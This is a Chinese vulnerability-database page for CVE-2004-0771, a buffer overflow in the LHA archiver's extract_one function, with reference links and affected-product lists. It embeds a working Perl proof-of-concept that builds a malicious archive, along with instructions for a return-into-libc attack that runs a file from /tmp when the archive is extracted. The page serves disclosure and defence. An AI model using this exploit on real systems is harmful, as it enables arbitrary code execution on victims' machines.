CVE-2004-0771
CVSS10.0
发布时间 :2004-11-23 00:00:00
修订时间 :2016-10-17 22:48:52
NMCOES    

[原文]Buffer overflow in the extract_one function from lhext.c in LHA may allow attackers to execute arbitrary code via a long w (working directory) command line option, a different issue than CVE-2004-0769. NOTE: this issue may be REJECTED if there are not any cases in which LHA is setuid or is otherwise used across security boundaries.


[CNNVD]LHA extract_one多重缓冲区溢出漏洞(CNNVD-200411-074)

        LHA lhext.c的extract_one函数存在缓冲区溢出漏洞。远程攻击者可以借助一个长w(工作目录)命令行选项执行任意代码。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:tsugio_okamoto:lha:1.17
cpe:/a:tsugio_okamoto:lha:1.14
cpe:/a:tsugio_okamoto:lha:1.15

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:9595Buffer overflow in the extract_one function from lhext.c in LHA may allow attackers to execute arbitrary code via a long w (working director...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0771
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0771
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-074
(官方数据源) CNNVD

- 其它链接及资源

http://bugs.gentoo.org/show_bug.cgi?id=51285
(UNKNOWN)  MISC  http://bugs.gentoo.org/show_bug.cgi?id=51285
http://marc.info/?l=bugtraq&m=108668791510153
(UNKNOWN)  BUGTRAQ  20040606 Re: [SECURITY] [DSA 515-1] New lha packages fix several
http://www.gentoo.org/security/en/glsa/glsa-200409-13.xml
(UNKNOWN)  GENTOO  GLSA-200409-13
http://www.redhat.com/support/errata/RHSA-2004-323.html
(UNKNOWN)  REDHAT  RHSA-2004:323
http://www.redhat.com/support/errata/RHSA-2004-440.html
(UNKNOWN)  REDHAT  RHSA-2004:440
http://www.securityfocus.com/archive/1/363418
(UNKNOWN)  BUGTRAQ  20040515 lha buffer overflow(s) again
http://www.securityfocus.com/bid/10354
(VENDOR_ADVISORY)  BID  10354
http://xforce.iss.net/xforce/xfdb/16196
(VENDOR_ADVISORY)  XF  lha-extractone-bo(16196)
https://bugzilla.fedora.us/show_bug.cgi?id=1833
(UNKNOWN)  FEDORA  FLSA:1833

- 漏洞信息

LHA extract_one多重缓冲区溢出漏洞
危急 缓冲区溢出
2004-11-23 00:00:00 2006-09-20 00:00:00
远程  
        LHA lhext.c的extract_one函数存在缓冲区溢出漏洞。远程攻击者可以借助一个长w(工作目录)命令行选项执行任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (24120)

LHA 1.x Multiple extract_one Buffer Overflow Vulnerabilities (EDBID:24120)
linux remote
2004-05-19 Verified
0 Lukasz Wojtow
N/A [点击下载]
source: http://www.securityfocus.com/bid/10354/info

LHA has been reported prone to multiple vulnerabilities that may allow a malicious archive to execute arbitrary code or corrupt arbitrary files when the archive is operated on. These issues are triggered in the 'extract_one()' and are due to a failure of the application to properly validate string lengths in offending files.

These issues might allow an attacker to execute code in the context of a user invoking the affected utility.

Exploiting lha-1.14 (after security advisories)
19 May, 2004
Copyright (2004) Lukasz Wojtow <lw@wszia.edu.pl>

At the time of writing this text, some vulnerabilities have been discovered
and fixed, but not all (i've sent info to major linux distributions and 
Bugtraq, but they didn't seem to bother).
This code creates an archive, which decompressed with lha-1.14
will cause a buffer overflow. The bug is in function extract_one (there are a 
lot of bugs, actually). At first it looked like like a typical stack overflow,
but after a couple of thoughts it was obvious that returnig on the stack was 
impossible (due to special 0xff handling). The only option came to my mind 
was return-into-libc.
Addresses inside this code do system("/tmp/lhXXXXXX") and exit().
Before exploiting 3 addresses have to be obtained:
- system function,
- exit function (not really needed, but SEGFAULT could be noticed),
- address of /tmp/lhXXXXXX inside exploitet binary.
Put these addresses into their place in the code (in little endian order 
on x86) and run:
./code > archive.lhz

then command
lha -e archive.lhz 
will cause execution of /tmp/lhXXXXXX
Enjoy

---CODE START---

#!/usr/bin/perl
my $exit_addr= "\x50\xf2\x4\x40";
my $system_addr= "\x30\x65\x6\x40";
my $tmp_string= "\xfa\x1e\x5\x8";

print	"\x19\x8d\x2d\x6c\x68\x64\x2d\x18\x0\x0\x0\x0\x0\x0\x0\xe1\xa5".
	"\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0".
	"\x0\x0\x5\x0\x2\x46\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\xde".
	"\x2d\x6c\x68\x64\x2d\x69\x0\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20".
	"\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\x56\x0\x2".
	"\x46\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\x2f\x2d\x6c\x68".
	"\x64\x2d\xba\x0\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20\x1\x0\x0\x0".
	"\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\xa7\x0\x2\x46\xff\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\x81\x2d\x6c\x68\x64\x2d".
	"\xb\x1\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0".
	"\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\xf8\x0\x2\x46\xff\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff".
	"\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\xff\x2d\x6c\x68\x64\x2d\x48".
	"\x1\x0\x0\x0\x0\x0\x0\x21\xa6\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50".
	"\xed\x41\x7\x0\x51\x0\x0\x0\x0\x35\x1\x2\x46\xff\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x7\x0\x54\xaf\x68".
	"\xaa\x40\x0\x0\x19\x10\x2d\x6c\x68\x64\x2d\x59\x1\x0\x0\x0\x0\x0\x0".
	"\x21\xa6\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0".
	"\x0\x0\x0\x46\x1\x2\x46\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\xff\x41\x41\x41\x41".
	$system_addr.  $exit_addr.  $tmp_string.
	"\xff\x7\x0\x54\xaf\x68\xaa\x40\x0\x0\x0";

---CODE END---		

- 漏洞信息

9520
LHA extract_one Function Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-05-15 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

LHA Multiple extract_one Buffer Overflow Vulnerabilities
Boundary Condition Error 10354
Yes No
2004-05-15 12:00:00 2009-07-12 04:07:00
Discovery of this issue is credited to Lukasz Wojtow <lw@wszia.edu.pl>.

- 受影响的程序版本

Mr. S.K. LHA 1.17
Mr. S.K. LHA 1.15
Mr. S.K. LHA 1.14
F-Secure Personal Express 4.7
F-Secure Personal Express 4.6
F-Secure Personal Express 4.5
F-Secure Internet Security 2004
F-Secure Internet Security 2003
F-Secure Internet Gatekeeper 6.32
F-Secure Internet Gatekeeper 6.31
F-Secure F-Secure for Firewalls 6.20
F-Secure Anti-Virus for Workstations 5.42
F-Secure Anti-Virus for Workstations 5.41
F-Secure Anti-Virus for Windows Servers 5.42
F-Secure Anti-Virus for Windows Servers 5.41
F-Secure Anti-Virus for Samba Servers 4.60
F-Secure Anti-Virus for MS Exchange 6.21
F-Secure Anti-Virus for MIMEsweeper 5.42
F-Secure Anti-Virus for MIMEsweeper 5.41
F-Secure Anti-Virus for Linux Workstations 4.52
F-Secure Anti-Virus for Linux Workstations 4.51
F-Secure Anti-Virus for Linux Servers 4.52
F-Secure Anti-Virus for Linux Servers 4.51
F-Secure Anti-Virus for Linux Gateways 4.52
F-Secure Anti-Virus for Linux Gateways 4.51
F-Secure Anti-Virus Client Security 5.52
F-Secure Anti-Virus Client Security 5.50
F-Secure Anti-Virus 2004
F-Secure Anti-Virus 2003

- 漏洞讨论

LHA has been reported prone to multiple vulnerabilities that may allow a malicious archive to execute arbitrary code or corrupt arbitrary files when the archive is operated on. These issues are triggered in the 'extract_one()' and are due to a failure of the application to properly validate string lengths in offending files.

These issues might allow an attacker to execute code in the context of a user invoking the affected utility.

- 漏洞利用

The following proof of concept exploit code is available:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站